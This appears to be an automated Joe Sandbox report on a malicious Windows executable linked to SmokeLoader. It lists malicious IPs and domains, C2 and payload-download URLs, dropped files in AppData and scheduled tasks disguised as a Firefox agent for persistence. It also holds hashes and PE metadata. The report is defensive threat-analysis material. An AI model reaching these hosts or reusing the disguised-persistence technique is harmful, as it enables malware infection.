https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1808911051.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
190.147.128.172	nwgrus.ru	Colombia	10620	TelmexColombiaSACO	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
175.119.10.231	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532238
Start date and time:	2024-10-12 22:27:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@22/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 82 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 40.126.32.76, 20.190.160.14, 20.190.160.22, 40.126.32.134, 40.126.32.138, 40.126.32.72, 40.126.32.68, 40.126.32.136
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target fgbwcit, PID 5356 because there are no executed function
Execution Graph export aborted for target trbwcit, PID 1432 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:28:15	API Interceptor	377037x Sleep call for process: explorer.exe modified
21:28:32	Task Scheduler	Run new task: Firefox Default Browser Agent F8FEE74F6B84D0A6 path: C:\Users\user\AppData\Roaming\trbwcit
21:29:28	Task Scheduler	Run new task: Firefox Default Browser Agent B72083AE88054687 path: C:\Users\user\AppData\Roaming\fgbwcit

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
190.147.128.172	wu5C20dPdy.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	RWcyVDbMGQ.exe	Get hash	malicious	SmokeLoader	Browse	100xmargin.com/tmp/index.php
	C1APU2jz2B.exe	Get hash	malicious	SmokeLoader	Browse	100xmargin.com/tmp/index.php
	xvJv1BpknZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
23.145.40.164	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse
175.119.10.231	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	mLn7GEEpuS.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc	Browse	epohe.ru/tmp/
	Ltoj8zXMGf.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	kCiQWUqQtC.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
	SWjcpYfYPy.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	sdfjhuz.com/dl/build2.exe
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	sdfjhuz.com/dl/build2.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	187.211.161.52
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	201.103.8.135
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	160.177.223.165

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TelmexColombiaSACO	na.elf	Get hash	malicious	Mirai	Browse	190.143.63.156
	7aodVUk6TV.elf	Get hash	malicious	Mirai, Okiru	Browse	186.86.212.65
	79VAlgfTk8.elf	Get hash	malicious	Mirai	Browse	181.56.182.151
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	na.elf	Get hash	malicious	Mirai	Browse	190.143.63.127
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	190.156.239.49
	na.elf	Get hash	malicious	Mirai	Browse	190.156.168.129
	5zA3mXMdtG.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	200.118.227.2
	970Qh1XiFt.elf	Get hash	malicious	Mirai, Okiru	Browse	181.48.255.110
SKB-ASSKBroadbandCoLtdKR	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	175.119.10.231
	na.elf	Get hash	malicious	Mirai	Browse	222.238.145.97
	na.elf	Get hash	malicious	Unknown	Browse	39.122.198.97
	na.elf	Get hash	malicious	Mirai	Browse	222.238.145.88
	na.elf	Get hash	malicious	Mirai	Browse	1.253.35.1
	na.elf	Get hash	malicious	Mirai	Browse	1.235.113.234
	na.elf	Get hash	malicious	Mirai	Browse	1.248.72.126
	6DroQ0jTFY.elf	Get hash	malicious	Mirai	Browse	58.122.30.38
	cqdEWgq9fW.elf	Get hash	malicious	Mirai	Browse	114.204.119.182
	dNBHFhYkoO.elf	Get hash	malicious	Mirai, Okiru	Browse	58.232.149.105
SURFAIRWIRELESS-IN-01US	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	O4zPA1oI9Y.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\565.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	242688
Entropy (8bit):	5.8793046064049905
Encrypted:	false
SSDEEP:	3072:9TA7cae5AP1XfHJ2IQg4cq5FQ+CoNmp8FBxqXYUGrG:9TA7cjOP1vJ28+FwwqI
MD5:	F42E9B6758241070E7815B8BD1EB8335
SHA1:	E9C8CBE1D1BF1B47A913C0900EA86ADB1F553631
SHA-256:	07C4DB8CD40625B3BA63A1DB74432EA62A8ADC5ABECDF32166BC25AB75AD79D5
SHA-512:	35DD401427C3FE5C03A7B363545B93E4E5C09EF7EFA0D55F109A25460E21CBB04D5539A54C0BB001AF74D13936ECC3DF7FD7C7919B3906BA32BE830459941C0E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L...z..d.................N....r..............`....@...........................s......4......................................tw..<.....r..............................................................................`..\|............................text...OL.......N.................. ..`.rdata..& ...`..."...R..............@..@.data...\|.o..........t..............@....puneki..D....q..8..................@....fok.....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fgbwcit

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	242688
Entropy (8bit):	5.8793046064049905
Encrypted:	false
SSDEEP:	3072:9TA7cae5AP1XfHJ2IQg4cq5FQ+CoNmp8FBxqXYUGrG:9TA7cjOP1vJ28+FwwqI
MD5:	F42E9B6758241070E7815B8BD1EB8335
SHA1:	E9C8CBE1D1BF1B47A913C0900EA86ADB1F553631
SHA-256:	07C4DB8CD40625B3BA63A1DB74432EA62A8ADC5ABECDF32166BC25AB75AD79D5
SHA-512:	35DD401427C3FE5C03A7B363545B93E4E5C09EF7EFA0D55F109A25460E21CBB04D5539A54C0BB001AF74D13936ECC3DF7FD7C7919B3906BA32BE830459941C0E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L...z..d.................N....r..............`....@...........................s......4......................................tw..<.....r..............................................................................`..\|............................text...OL.......N.................. ..`.rdata..& ...`..."...R..............@..@.data...\|.o..........t..............@....puneki..D....q..8..................@....fok.....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\trbwcit

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	243200
Entropy (8bit):	5.896612954245981
Encrypted:	false
SSDEEP:	3072:tTA5IqRZn1qS6GF3Sv3zscq5SQ+CoNep0FBxqXYUGrG:tTAuqRZ7ndw3y+FBqI
MD5:	F0342947877C844A5C82CB4BB5FDADAD
SHA1:	C460F35ED9F2B3FD6172F38C70B6073FFFE70F17
SHA-256:	E93BC7594D1FC8CA1EFF0E522B8547E74B3AC33840C55B4F50F69278E4CD8242
SHA-512:	3B6657DE56FE6EBBE964512091638596D41962B1C7E531A81BC85003F4A194232C1083904E0817E6E6F969567517131FE12D11BA0065EA804362DE5EF709B2F7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L....,.e.................P....r..............`....@...........................s......w......................................tw..<.....r..............................................................................`..\|............................text...oO.......P.................. ..`.rdata..& ...`..."...T..............@..@.data...\|.o..........v..............@....vugud...D....q..8..................@....fay.....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\trbwcit:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.896612954245981
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	243'200 bytes
MD5:	f0342947877c844a5c82cb4bb5fdadad
SHA1:	c460f35ed9f2b3fd6172f38c70b6073fffe70f17
SHA256:	e93bc7594d1fc8ca1eff0e522b8547e74b3ac33840c55b4f50f69278e4cd8242
SHA512:	3b6657de56fe6ebbe964512091638596d41962b1c7e531a81bc85003f4a194232c1083904e0817e6e6f969567517131fe12d11ba0065ea804362de5ef709b2f7
SSDEEP:	3072:tTA5IqRZn1qS6GF3Sv3zscq5SQ+CoNep0FBxqXYUGrG:tTAuqRZ7ndw3y+FBqI
TLSH:	1E342A41EEF13C14F673DA31DE3992E8A62FF9E25E20625E11A45A0F08F1291C57B736
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y............................F............................Rich...........................PE..L....,.e...

File Icon


Icon Hash:	738733b18b8b8be4

Static PE Info

General

Entrypoint:	0x4018e4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x657F2CA1 [Sun Dec 17 17:15:13 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	636068238a0ab0df9c8e341eee8428d0

Entrypoint Preview

Instruction
call 00007FAAD08C7390h
jmp 00007FAAD08C3C8Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041A3D0h], eax
mov dword ptr [0041A3CCh], ecx
mov dword ptr [0041A3C8h], edx
mov dword ptr [0041A3C4h], ebx
mov dword ptr [0041A3C0h], esi
mov dword ptr [0041A3BCh], edi
mov word ptr [0041A3E8h], ss
mov word ptr [0041A3DCh], cs
mov word ptr [0041A3B8h], ds
mov word ptr [0041A3B4h], es
mov word ptr [0041A3B0h], fs
mov word ptr [0041A3ACh], gs
pushfd
pop dword ptr [0041A3E0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041A3D4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041A3D8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041A3E4h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041A320h], 00010001h
mov eax, dword ptr [0041A3D8h]
mov dword ptr [0041A2D4h], eax
mov dword ptr [0041A2C8h], C0000409h
mov dword ptr [0041A2CCh], 00000001h
mov eax, dword ptr [00419008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041900Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000DCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17774	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2721000	0x1cac0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14f6f	0x15000	f8d0a9d4becd8846b657e5f44f1141fd	False	0.8229747953869048	data	7.548546960257042	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x2026	0x2200	6da4b7c2534b0027fef7635e158ee334	False	0.36247702205882354	data	5.4153798035975225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x26fff7c	0x1400	50c0dd9d406b2697a593034cdc3cf287	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vugud	0x2719000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fay	0x271e000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2721000	0x1cac0	0x1cc00	0267d5c30b13ca618b1ccdaa9189f178	False	0.4420091711956522	data	5.0953748346714445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x27219d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5700959488272921
RT_ICON	0x2722878	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6371841155234657
RT_ICON	0x2723120	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6935483870967742
RT_ICON	0x27237e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2723d50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5137966804979253
RT_ICON	0x27262f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6128048780487805
RT_ICON	0x27273a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6180327868852459
RT_ICON	0x2727d28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7570921985815603
RT_ICON	0x2728208	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3368869936034115
RT_ICON	0x27290b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5252707581227437
RT_ICON	0x2729958	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5858294930875576
RT_ICON	0x272a020	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6372832369942196
RT_ICON	0x272a588	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4263485477178423
RT_ICON	0x272cb30	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.49959016393442623
RT_ICON	0x272d4b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5062056737588653
RT_ICON	0x272d988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39498933901918976
RT_ICON	0x272e830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5546028880866426
RT_ICON	0x272f0d8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6169354838709677
RT_ICON	0x272f7a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6423410404624278
RT_ICON	0x272fd08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.42706378986866794
RT_ICON	0x2730db0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4245901639344262
RT_ICON	0x2731738	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4645390070921986
RT_ICON	0x2731c08	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.28331556503198296
RT_ICON	0x2732ab0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.36913357400722024
RT_ICON	0x2733358	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.37672811059907835
RT_ICON	0x2733a20	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3786127167630058
RT_ICON	0x2733f88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.25778008298755184
RT_ICON	0x2736530	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.275328330206379
RT_ICON	0x27375d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28647540983606556
RT_ICON	0x2737f60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32358156028368795
RT_STRING	0x27385f8	0xcc	data			0.553921568627451
RT_STRING	0x27386c8	0x50c	data			0.4473684210526316
RT_STRING	0x2738bd8	0x3aa	data			0.4616204690831556
RT_STRING	0x2738f88	0x52c	data			0.4516616314199396
RT_STRING	0x27394b8	0x652	data			0.4338689740420272
RT_STRING	0x2739b10	0x798	data			0.41975308641975306
